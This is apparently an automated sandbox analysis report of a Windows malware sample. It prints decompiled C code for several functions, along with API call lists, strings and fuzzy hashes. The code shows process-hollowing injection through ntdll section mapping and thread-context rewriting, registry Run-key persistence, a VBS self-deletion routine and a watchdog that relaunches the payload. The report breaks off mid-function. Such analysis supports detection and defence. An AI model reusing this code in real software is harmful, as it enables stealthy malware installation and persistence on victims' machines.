                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    • API String ID: 479521175-865373369
                    • Opcode ID: ec15fa98cea3d78183887d2b25b4fad16d43b420e78df4d292cf44244b22c479
                    • Instruction ID: 14e7487399ba1fd70ea331c62ec4cafd0bb9d4ecd5deee876d7c9955afd64b2a
                    • Opcode Fuzzy Hash: ec15fa98cea3d78183887d2b25b4fad16d43b420e78df4d292cf44244b22c479
                    • Instruction Fuzzy Hash: E5B138715083059FD720AF24DD44BABBBF8EF88755F00482EF98993291EB34E945CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00416FDD Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E00416FDD(intOrPtr __ecx, void __edx) {
				void* __edi;
				_Unknown_base(*)()* _t81;
				int _t87;
				signed int _t110;
				int _t117;
				intOrPtr _t119;
				int _t122;
				long _t123;
				int _t128;
				void _t141;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t154;
				struct _PROCESS_INFORMATION* _t157;
				void _t158;
				intOrPtr _t160;
				intOrPtr* _t162;
				intOrPtr* _t164;
				int _t166;
				void* _t167;
				void* _t168;

				_t164 = __edx;
				_t157 =  *(_t167 + 0x94);
				 *(_t167 + 0x34) = __edx;
				 *((intOrPtr*)(_t167 + 0x30)) = __ecx;
				 *((intOrPtr*)(_t167 + 0x1c)) = 0;
				while(1) {
					 *(_t167 + 0x34) = 0;
					 *(_t167 + 0x18) = 0;
					 *((intOrPtr*)(_t167 + 0x1c)) = 0;
					 *((intOrPtr*)(_t167 + 0x20)) = 0;
					 *0x470d90 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
					 *0x470d84 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
					 *0x470d88 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
					_t81 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwClose");
					 *0x470d8c = _t81;
					if( *0x470d84 == 0 ||  *0x470d88 == 0 ||  *0x470d90 == 0 || _t81 == 0) {
						break;
					}
					_t160 = 0x44;
					E00435760(_t157, _t167 + 0x4c, 0, _t160);
					_t168 = _t167 + 0xc;
					 *((intOrPtr*)(_t168 + 0x48)) = _t160;
					E00435760(_t157, _t157, 0, 0x10);
					_t167 = _t168 + 0xc;
					if( *_t164 != 0x5a4d) {
						break;
					}
					_t162 =  *((intOrPtr*)(_t164 + 0x3c)) + _t164;
					if( *_t162 != 0x4550) {
						break;
					}
					_t87 =  *(_t162 + 0x50);
					 *(_t167 + 0x24) = _t87;
					 *(_t167 + 0x44) = _t87;
					 *((intOrPtr*)(_t167 + 0x48)) = 0;
					 *((intOrPtr*)(_t167 + 0x2c)) =  *((intOrPtr*)(_t162 + 0x34));
					if(CreateProcessW(0,  *(_t167 + 0x50), 0, 0, 0, 4, 0, 0, _t167 + 0x4c, _t157) == 0) {
						GetLastError();
						break;
					}
					_t145 = VirtualAlloc(0, 4, 0x1000, 4);
					 *(_t167 + 0x3c) = _t145;
					 *_t145 = 0x10007;
					if(GetThreadContext(_t157->hThread, _t145) == 0 || ReadProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x34, 4, _t167 + 0x3c) == 0) {
						L32:
						VirtualFree(_t145, 0, 0x8000);
						 *0x470d88(GetCurrentProcess(), _t167 + 0x14);
						 *0x470d8c( *(_t167 + 0x18));
						TerminateProcess(_t157->hProcess, 0);
						break;
					} else {
						_push(0);
						_push(0x8000000);
						_push(0x40);
						_push(_t167 + 0x4c);
						_push(0);
						_push(0xf001f);
						_push(_t167 + 0x30);
						if( *0x470d90() != 0) {
							goto L32;
						}
						_t110 =  !( *(_t162 + 0x16) & 0x0000ffff) & 0x00000001;
						 *(_t167 + 0x24) = _t110;
						if(_t110 == 0) {
							_t141 =  *(_t167 + 0x28);
							 *(_t167 + 0x18) = _t141;
							 *0x470d88(_t157->hProcess, _t141);
						}
						_push(0x40);
						_push(0);
						_push(1);
						_push(_t167 + 0x24);
						_push(0);
						_push(0);
						_push(0);
						_push(_t167 + 0x2c);
						_push(_t157->hProcess);
						_push( *(_t167 + 0x3c));
						if( *0x470d84() == 0) {
							_t117 =  *0x470d84( *(_t167 + 0x3c), GetCurrentProcess(), _t167 + 0x30, 0, 0, 0, _t167 + 0x24, 1, 0, 0x40);
							__eflags = _t117;
							if(_t117 != 0) {
								goto L32;
							}
							__eflags =  *(_t167 + 0x24) - _t117;
							if( *(_t167 + 0x24) != _t117) {
								 *((intOrPtr*)(_t162 + 0x34)) =  *((intOrPtr*)(_t167 + 0x10));
							}
							E004351E0( *((intOrPtr*)(_t167 + 0x1c)), _t164,  *((intOrPtr*)(_t162 + 0x54)));
							 *(_t167 + 0x3c) =  *(_t167 + 0x3c) & 0x00000000;
							_t119 =  *((intOrPtr*)(_t164 + 0x3c));
							_t167 = _t167 + 0xc;
							__eflags = 0 -  *(_t162 + 6);
							if(0 >=  *(_t162 + 6)) {
								L23:
								__eflags =  *(_t167 + 0x24);
								_t154 =  *((intOrPtr*)(_t167 + 0x10));
								if( *(_t167 + 0x24) != 0) {
									_t129 =  *(_t167 + 0x28);
									__eflags =  *(_t167 + 0x28) - _t154;
									if(__eflags != 0) {
										E004173F1( *((intOrPtr*)(_t167 + 0x1c)), __eflags, _t129, 0, _t154, 0);
										_t154 =  *((intOrPtr*)(_t167 + 0x20));
										_t167 = _t167 + 0x10;
									}
								}
								__eflags =  *((intOrPtr*)(_t167 + 0x2c)) - _t154;
								if( *((intOrPtr*)(_t167 + 0x2c)) == _t154) {
									L29:
									 *((intOrPtr*)(_t145 + 0xb0)) =  *((intOrPtr*)(_t162 + 0x28)) + _t154;
									_t122 = SetThreadContext(_t157->hThread, _t145);
									__eflags = _t122;
									if(_t122 == 0) {
										goto L32;
									}
									_t123 = ResumeThread(_t157->hThread);
									__eflags = _t123 - 0xffffffff;
									if(_t123 == 0xffffffff) {
										goto L32;
									}
									return 1;
								} else {
									_t128 = WriteProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x18, 4, 0);
									__eflags = _t128;
									if(_t128 == 0) {
										goto L32;
									}
									_t154 =  *((intOrPtr*)(_t167 + 0x10));
									goto L29;
								}
							} else {
								_t158 =  *(_t167 + 0x34);
								_t146 =  *((intOrPtr*)(_t167 + 0x30));
								_t166 = _t164 + 0x10c + _t119;
								__eflags = _t166;
								do {
									E004351E0( *((intOrPtr*)(_t166 - 8)) +  *((intOrPtr*)(_t167 + 0x1c)),  *_t166 + _t158,  *((intOrPtr*)(_t166 - 4)));
									_t166 = _t166 + 0x28;
									_t167 = _t167 + 0xc;
									_t146 = _t146 + 1;
									__eflags = _t146 - ( *(_t162 + 6) & 0x0000ffff);
								} while (_t146 < ( *(_t162 + 6) & 0x0000ffff));
								_t157 =  *(_t167 + 0x94);
								_t145 =  *(_t167 + 0x38);
								goto L23;
							}
						} else {
							VirtualFree(_t145, 0, 0x8000);
							 *0x470d8c( *(_t167 + 0x18));
							TerminateProcess( *_t157, 0);
							_t148 =  *((intOrPtr*)(_t167 + 0x1c)) + 1;
							_push(0);
							 *((intOrPtr*)(_t167 + 0x20)) = _t148;
							_pop(0);
							if(_t148 <= 0x64) {
								continue;
							}
							break;
						}
					}
				}
				return 0;
			}

























                    0x00416ff4
                    0x00416ff7
                    0x00416ffe
                    0x00417002
                    0x00417006
                    0x0041700a
                    0x00417014
                    0x00417018
                    0x0041701c
                    0x00417020
                    0x00417033
                    0x00417047
                    0x0041705b
                    0x00417063
                    0x0041706c
                    0x00417071
                    0x00000000
                    0x00000000
                    0x0041709b
                    0x004170a5
                    0x004170aa
                    0x004170ad
                    0x004170b5
                    0x004170bf
                    0x004170c6
                    0x00000000
                    0x00000000
                    0x004170cf
                    0x004170d7
                    0x00000000
                    0x00000000
                    0x004170dd
                    0x004170e1
                    0x004170e5
                    0x004170e9
                    0x004170f0
                    0x0041710d
                    0x00417368
                    0x00000000
                    0x00417368
                    0x00417123
                    0x00417126
                    0x0041712a
                    0x0041713b
                    0x00417332
                    0x0041733a
                    0x0041734c
                    0x00417356
                    0x00417360
                    0x00000000
                    0x00417167
                    0x00417167
                    0x00417169
                    0x0041716e
                    0x00417174
                    0x00417175
                    0x00417177
                    0x00417180
                    0x00417189
                    0x00000000
                    0x00000000
                    0x00417195
                    0x00417198
                    0x0041719c
                    0x0041719e
                    0x004171a5
                    0x004171a9
                    0x004171a9
                    0x004171af
                    0x004171b7
                    0x004171b8
                    0x004171ba
                    0x004171bb
                    0x004171bc
                    0x004171bd
                    0x004171c2
                    0x004171c3
                    0x004171c5
                    0x004171d1
                    0x0041723a
                    0x00417240
                    0x00417242
                    0x00000000
                    0x00000000
                    0x00417248
                    0x0041724c
                    0x00417252
                    0x00417252
                    0x0041725d
                    0x00417262
                    0x00417269
                    0x0041726c
                    0x0041726f
                    0x00417273
                    0x004172b5
                    0x004172b5
                    0x004172ba
                    0x004172be
                    0x004172c0
                    0x004172c4
                    0x004172c6
                    0x004172d2
                    0x004172d7
                    0x004172db
                    0x004172db
                    0x004172c6
                    0x004172de
                    0x004172e2
                    0x00417307
                    0x0041730d
                    0x00417316
                    0x0041731c
                    0x0041731e
                    0x00000000
                    0x00000000
                    0x00417323
                    0x00417329
                    0x0041732c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004172e4
                    0x004172f9
                    0x004172ff
                    0x00417301
                    0x00000000
                    0x00000000
                    0x00417303
                    0x00000000
                    0x00417303
                    0x00417275
                    0x00417275
                    0x0041727f
                    0x00417283
                    0x00417283
                    0x00417285
                    0x00417296
                    0x0041729f
                    0x004172a2
                    0x004172a5
                    0x004172a6
                    0x004172a6
                    0x004172aa
                    0x004172b1
                    0x00000000
                    0x004172b1
                    0x004171d3
                    0x004171db
                    0x004171e5
                    0x004171ef
                    0x004171ff
                    0x00417200
                    0x00417202
                    0x0041720f
                    0x00417210
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00417216
                    0x004171d1
                    0x0041713b
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417024
                    • GetProcAddress.KERNEL32(00000000), ref: 00417027
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417038
                    • GetProcAddress.KERNEL32(00000000), ref: 0041703B
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041704C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041704F
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00417060
                    • GetProcAddress.KERNEL32(00000000), ref: 00417063
                    • CreateProcessW.KERNEL32 ref: 00417105
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041711D
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00417133
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00417159
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004171DB
                    • TerminateProcess.KERNEL32(?,00000000), ref: 004171EF
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041722F
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 004172F9
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00417316
                    • ResumeThread.KERNEL32(?), ref: 00417323
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041733A
                    • GetCurrentProcess.KERNEL32(?), ref: 00417345
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417360
                    • GetLastError.KERNEL32 ref: 00417368
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    • API String ID: 4188446516-3035715614
                    • Opcode ID: 26beb8965d7d96426694d17baad4d02b611eba89cef2aa280885858bf170de8b
                    • Instruction ID: 266150a76addbd25bf96a89ad10f512fef98d9a90c2618b82beff4a0ecbb5786
                    • Opcode Fuzzy Hash: 26beb8965d7d96426694d17baad4d02b611eba89cef2aa280885858bf170de8b
                    • Instruction Fuzzy Hash: E1A15DB0548304EFD7209F61DC85BAB7BF8FB48705F10042AFA55D6291D778E884CB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C5A4 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 259registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E0040C5A4() {
				short _v524;
				char _v548;
				char _v572;
				char _v576;
				char _v596;
				char _v600;
				void* _v604;
				char _v620;
				char _v624;
				void* _v628;
				char _v644;
				char _v648;
				char _v652;
				char _v668;
				char _v672;
				void* _v676;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t71;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t195;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t232;

				E00411D93();
				if( *0x46f9d4 != 0x30) {
					E0040AE1C();
				}
				_t228 =  *0x470d63 - 1; // 0x0
				if(_t228 == 0) {
					E004185EF(_t195, _t228);
				}
				if( *0x470a85 != 0) {
					E0041AC0A(E00401EE4(0x472d40), _t195);
				}
				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t230 =  *0x470b33 - 1; // 0x1
				if(_t230 == 0) {
					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
				}
				_t231 =  *0x470b30 - 1; // 0x1
				if(_t231 == 0) {
					E00412D0B(0x80000002, _t213, E00401EE4(0x473208));
				}
				_t232 =  *0x470b31 - 1; // 0x0
				if(_t232 == 0) {
					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
				}
				E00435760(0,  &_v524, 0, 0x208);
				_t49 = E0040245C();
				_t50 = E00401F8B(0x473280);
				_t53 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t50, _t49);
				_t233 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
				_t56 = E00406E2B(_t233);
				_t234 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401EE4(0x473250), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
				asm("sbb bl, bl");
				E00402FF4(_t123,  &_v548, E0041A7B9( &_v620, E0041A4D3( &_v668)), 0, 0x46a8f0, _t234, L".vbs");
				E00401EE9();
				E00401FB8();
				E004042FD(_t123,  &_v576, E00402FF4(_t123,  &_v672, E0040415E(_t123,  &_v620, _t60, 0x46a8f0, E0043A99F(_t123,  &_v668, _t234, L"Temp")), 0, 0x46a8f0, _t234, "\\"), 0x46a8f0, _t234,  &_v548);
				E00401EE9();
				E00401EE9();
				_t71 = E0040415E(_t123,  &_v672, _t67, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t202 = L"On Error Resume Next\n";
				E004042DC(_t123,  &_v652, L"On Error Resume Next\n", 0x46a8f0, _t234, _t71);
				E00401EE9();
				_t124 = _t123 & 0x00000001;
				_t235 = _t124;
				if(_t124 != 0) {
					_t202 = E004042DC(_t124,  &_v624, L"while fso.FileExists(\"", 0x46a8f0, _t235, E0040415E(_t124,  &_v596, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
					E0040323D(E00402FF4(_t124,  &_v672, _t98, 0, 0x46a8f0, _t235, L"\")\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
				}
				E0040323D(E00402FF4(_t124,  &_v600, E00402FF4(_t124,  &_v672, E0040415E(_t124,  &_v620, _t202, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t235,  &_v524), 0, 0x46a8f0, _t235, L"\"\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t236 = _t124;
				if(_t124 != 0) {
					L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"wend\n");
				}
				_t82 = E00406E2B(_t236);
				_t237 = _t82;
				if(_t82 != 0) {
					_t36 =  &_v668; // 0x473250
					E0040323D(E00402FF4(_t124,  &_v596, E0040AEF6(_t36, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250), 0, 0x46a8f0, _t237, L"\"\n"));
					E00401EE9();
					E00401EE9();
				}
				L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401EE4( &_v576);
				_t85 = E0040245C();
				E00401EE4( &_v648);
				if(E0041AD6A(_t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401EE4( &_v572), 0x46a8f0, 0x46a8f0, 0);
				}
				ExitProcess(0);
			}


































                    0x0040c5ae
                    0x0040c5ba
                    0x0040c5bc
                    0x0040c5bc
                    0x0040c5c4
                    0x0040c5ca
                    0x0040c5cc
                    0x0040c5cc
                    0x0040c5d8
                    0x0040c5e6
                    0x0040c5e6
                    0x0040c5f0
                    0x0040c5f5
                    0x0040c5fb
                    0x0040c60c
                    0x0040c611
                    0x0040c617
                    0x0040c61d
                    0x0040c62b
                    0x0040c630
                    0x0040c631
                    0x0040c637
                    0x0040c648
                    0x0040c64d
                    0x0040c65f
                    0x0040c66e
                    0x0040c676
                    0x0040c698
                    0x0040c6a0
                    0x0040c6a2
                    0x0040c6ae
                    0x0040c6ae
                    0x0040c6c1
                    0x0040c6d5
                    0x0040c6e0
                    0x0040c6e2
                    0x0040c6f1
                    0x0040c6f1
                    0x0040c708
                    0x0040c70f
                    0x0040c72a
                    0x0040c734
                    0x0040c73d
                    0x0040c776
                    0x0040c780
                    0x0040c789
                    0x0040c797
                    0x0040c79d
                    0x0040c7a6
                    0x0040c7b0
                    0x0040c7b5
                    0x0040c7b5
                    0x0040c7b8
                    0x0040c7e0
                    0x0040c7f1
                    0x0040c7fa
                    0x0040c803
                    0x0040c80c
                    0x0040c80c
                    0x0040c849
                    0x0040c852
                    0x0040c85b
                    0x0040c864
                    0x0040c869
                    0x0040c86b
                    0x0040c876
                    0x0040c876
                    0x0040c884
                    0x0040c889
                    0x0040c88b
                    0x0040c898
                    0x0040c8b3
                    0x0040c8bc
                    0x0040c8c5
                    0x0040c8c5
                    0x0040c8d3
                    0x0040c8dd
                    0x0040c8e7
                    0x0040c8f4
                    0x0040c906
                    0x0040c91b
                    0x0040c91b
                    0x0040c922

                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6AE
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C6C1
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6F1
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C700
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                      • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040C91B
                    • ExitProcess.KERNEL32 ref: 0040C922
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$82G$@-G$On Error Resume Next$P2G$P2G$P2G(PF$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                    • API String ID: 3797177996-790292332
                    • Opcode ID: af05c1e3c5dc9ddb826154d330f7d895edef774a658f9b1daa80bde45ae6ee5b
                    • Instruction ID: 6e45ccf0452d088d16b27cf02e05fcd52a39cd31be9773de80b43fbe075aaa7b
                    • Opcode Fuzzy Hash: af05c1e3c5dc9ddb826154d330f7d895edef774a658f9b1daa80bde45ae6ee5b
                    • Instruction Fuzzy Hash: F7817F716043405BC718FB62D8929AF73E9AF90308F10493FB546A71E2EE7C9D49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004119B8 Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 190synchronizationsleepfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E004119B8() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				CHAR* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				int _t32;
				long _t38;
				int _t40;
				int _t42;
				long _t51;
				int _t53;
				void* _t56;
				int _t58;
				void* _t69;
				int _t71;
				int _t72;
				int _t73;
				long _t74;
				void* _t112;
				void* _t114;
				void* _t116;
				void* _t119;

				_v8 = _t74;
				_t24 = E00401F8B(0x473370);
				_t72 = 0;
				if(CreateMutexA(0, 1, _t24) != 0) {
					_t26 = E0040245C();
					_t27 = E00401F8B(0x473280);
					_t30 = E004129E0(E00401F8B(0x473238), "exepath",  &_v556, 0x208, _t27, _t26);
					_t119 = _t119 + 0x14;
					if(_t30 != 0) {
						E004020BF(0,  &_v32);
						_t32 = E0041ADFE( &_v32);
						_push(0);
						__eflags = _t32;
						if(_t32 == 0) {
							L2:
							ExitProcess();
						}
						CreateFileW( &_v556, 0x80000000, 1, 0, 3, 0x80, ??);
						_t114 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t114, 0xffffffff);
						CloseHandle(_t114);
						_t38 = GetCurrentProcessId();
						_t40 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t38);
						__eflags = _t40;
						if(_t40 == 0) {
							goto L1;
						}
						_t112 = ShellExecuteW;
						do {
							_t42 = PathFileExistsW( &_v556);
							__eflags = _t42;
							_t43 =  &_v556;
							if(_t42 != 0) {
								L13:
								ShellExecuteW(_t72, L"open", _t43, _t72, _t72, 1);
								L14:
								do {
									_t73 = E00412831(E00401F8B(0x473238), "WD",  &_v8);
									__eflags = _t73;
									if(_t73 == 0) {
										Sleep(0x1f4);
									} else {
										E00412C91(E00401F8B(0x473238), __eflags, "WD");
									}
									__eflags = _t73;
								} while (_t73 == 0);
								goto L19;
							}
							_t56 = E0040245C();
							E00401F8B( &_v32);
							_t58 = E0041AD6A(_t56,  &_v556, _t72);
							__eflags = _t58;
							if(_t58 == 0) {
								E00435760(_t112,  &_v1596, _t72, 0x208);
								_t119 = _t119 + 0xc;
								GetTempPathW(0x104,  &_v1596);
								GetTempFileNameW( &_v1596, L"temp_", _t72,  &_v1076);
								lstrcatW( &_v1076, L".exe");
								_t69 = E0040245C();
								E00401F8B( &_v32);
								_t71 = E0041AD6A(_t69,  &_v1076, _t72);
								__eflags = _t71;
								if(_t71 == 0) {
									goto L14;
								}
								_t43 =  &_v1076;
								goto L13;
							}
							_t43 =  &_v556;
							goto L13;
							L19:
							_t72 = 0;
							_t116 = OpenProcess(0x100000, 0, _v8);
							WaitForSingleObject(_t116, 0xffffffff);
							CloseHandle(_t116);
							_t51 = GetCurrentProcessId();
							_t53 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t51);
							__eflags = _t53;
						} while (_t53 != 0);
						goto L1;
					}
					_push(0);
					goto L2;
				}
				L1:
				_push(1);
				goto L2;
			}





























                    0x004119c3
                    0x004119cc
                    0x004119d4
                    0x004119df
                    0x004119f0
                    0x004119f8
                    0x00411a1d
                    0x00411a22
                    0x00411a27
                    0x00411a2f
                    0x00411a3d
                    0x00411a42
                    0x00411a43
                    0x00411a45
                    0x004119e3
                    0x004119e3
                    0x004119e3
                    0x00411a5d
                    0x00411a72
                    0x00411a77
                    0x00411a7e
                    0x00411a84
                    0x00411a99
                    0x00411aa0
                    0x00411aa2
                    0x00000000
                    0x00000000
                    0x00411aa8
                    0x00411aae
                    0x00411ab5
                    0x00411abb
                    0x00411abd
                    0x00411ac3
                    0x00411b79
                    0x00411b84
                    0x00411b86
                    0x00411b8b
                    0x00411ba2
                    0x00411ba6
                    0x00411ba8
                    0x00411bc5
                    0x00411baa
                    0x00411bb8
                    0x00411bbd
                    0x00411bcb
                    0x00411bcb
                    0x00000000
                    0x00411b8b
                    0x00411ace
                    0x00411ad8
                    0x00411ae1
                    0x00411ae8
                    0x00411aea
                    0x00411b04
                    0x00411b09
                    0x00411b18
                    0x00411b32
                    0x00411b44
                    0x00411b55
                    0x00411b5f
                    0x00411b68
                    0x00411b6f
                    0x00411b71
                    0x00000000
                    0x00000000
                    0x00411b73
                    0x00000000
                    0x00411b73
                    0x00411aec
                    0x00000000
                    0x00411bcf
                    0x00411bd2
                    0x00411be0
                    0x00411be5
                    0x00411bec
                    0x00411bf2
                    0x00411c0a
                    0x00411c11
                    0x00411c11
                    0x00000000
                    0x00411c19
                    0x00411a29
                    0x00000000
                    0x00411a29
                    0x004119e1
                    0x004119e1
                    0x00000000

                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,00473298,00000003), ref: 004119D7
                    • ExitProcess.KERNEL32(00000000), ref: 004119E3
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A5D
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411A6C
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A77
                    • CloseHandle.KERNEL32(00000000), ref: 00411A7E
                    • GetCurrentProcessId.KERNEL32 ref: 00411A84
                    • PathFileExistsW.SHLWAPI(?), ref: 00411AB5
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00411B18
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411B32
                    • lstrcatW.KERNEL32(?,.exe), ref: 00411B44
                      • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B84
                    • Sleep.KERNEL32(000001F4), ref: 00411BC5
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411BDA
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411BE5
                    • CloseHandle.KERNEL32(00000000), ref: 00411BEC
                    • GetCurrentProcessId.KERNEL32 ref: 00411BF2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: .exe$82G$82G$82G$WDH$exepath$open$p3G$temp_
                    • API String ID: 2649220323-3724276308
                    • Opcode ID: 7caec265afb69ecb8da572177a1ba02d05a1ee303e11ed8225a2b8a80e2b0253
                    • Instruction ID: 22e993795ca5e5f4b94ea2bece14d6f4ece3e8e9738639780bf53f9b9ba412ff
                    • Opcode Fuzzy Hash: 7caec265afb69ecb8da572177a1ba02d05a1ee303e11ed8225a2b8a80e2b0253
                    • Instruction Fuzzy Hash: D251F871A043157BDB10A7A0AC99EEF336C9B04715F1001BBF905A72D2EF789E858A5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C307 Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 203fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0040C307(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8, char _a12) {
				char _v24;
				char _v28;
				void* _v32;
				char _v48;
				char _v49;
				char _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t22;
				void* _t23;
				WCHAR* _t28;
				int _t29;
				void* _t35;
				WCHAR* _t43;
